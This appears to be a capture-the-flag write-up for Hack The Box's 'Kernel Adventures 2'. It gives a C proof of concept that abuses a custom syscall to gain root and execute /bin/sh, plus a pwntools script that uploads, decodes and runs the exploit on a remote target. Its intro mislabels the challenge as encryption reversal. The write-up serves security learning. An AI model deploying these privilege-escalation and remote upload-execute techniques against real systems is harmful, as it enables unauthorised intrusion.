Explore the basics of cybersecurity in the Kernel Adventures 2 Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/258

Description#

Apparently Linux authentication is done in userspace? That doesn’t sound safe, time to do it all in the kernel!

Exploitation#

Examining the kernel diff, we notice the addition of several new syscalls, including one named magic with syscall number 449.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>

#define MAX_USERS 65535
#define MAGIC_SYS 449

void do_add(char* username, char* password) {
    syscall(MAGIC_SYS, 0, username, password);
}

void do_delete(char* username) {
    syscall(MAGIC_SYS, 2, username);
}

void do_switch(char* username, char* password) {
    syscall(MAGIC_SYS, 3, username, password);
}

int main() {
    char *user = "pwn";
    char *pass = "12pwn34";
    for (int i = 0; i < MAX_USERS; i++) {
        do_add(user, pass);
        if (i == MAX_USERS - 1) {
            do_switch(user, pass);
            char *args[] = {"/bin/sh", NULL};
            execve(args[0], args, NULL);
            return 0;
        }
        do_delete(user);
    }
    for (int i = 0; i < 0xFFFFFFFF; i++) {
        if (syscall(MAGIC_SYS, 0, user, pass) == 0) {
            do_switch(user, pass);
            char *args[] = {"/bin/sh", NULL};
            execve(args[0], args, NULL);
            return 0;
        }
        do_delete(user);
    }
    return 0;
}

Use musl for compilation to produce more compact binaries.

musl-gcc -static -march=x86-64 -Os poc.c -o expl

Use this script to upload, decompress, execute the PoC, and get an interactive session as root.

#!/usr/bin/python3
from pwn import *
import base64,gzip

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

chunk_size = 256
file_name = 'expl'
file_name_encoded = file_name.encode()
with open(file_name, 'rb') as inf:
    exploit = inf.read()
data = base64.b64encode(gzip.compress(exploit))
conn = get_process()
n_chunks = (len(data) + chunk_size - 1) // chunk_size
for i in range(n_chunks):
    print(f'Uploading the exploit: {i + 1}/{n_chunks}')
    conn.recvuntil(b'$')
    conn.sendline(b'echo ' + data[chunk_size*i: (i+1)*chunk_size] + b' >> /home/user/' + file_name_encoded + b'.base64')

print('Uploading the exploit: ' + str(n_chunks) + '/' + str(n_chunks))
conn.sendline(b'cat /home/user/' + file_name_encoded + b'.base64 | base64 -d > /home/user/' + file_name_encoded + b'.gz')
conn.recvuntil(b'$')
conn.sendline(b'cat /home/user/' + file_name_encoded + b'.gz | gzip -d > /home/user/' + file_name_encoded)
conn.recvuntil(b'$')
conn.sendline(b'chmod +x /home/user/' + file_name_encoded)
conn.recvuntil(b'$')
conn.sendline(b'/home/user/' + file_name_encoded)
conn.interactive()

cat /flag.txt

Summary#

The Kernel Adventures: Part 2 Challenge on Hack The Box dives into kernel exploitation with a focus on syscall manipulation. This medium-level challenge introduces a custom magic syscall, enabling privilege escalation through user management. By leveraging compact PoC binaries and an efficient upload-execute pipeline, the challenge offers a hands-on experience in advanced exploitation techniques, culminating in root access and system compromise. Perfect for refining skills in kernel-level hacking.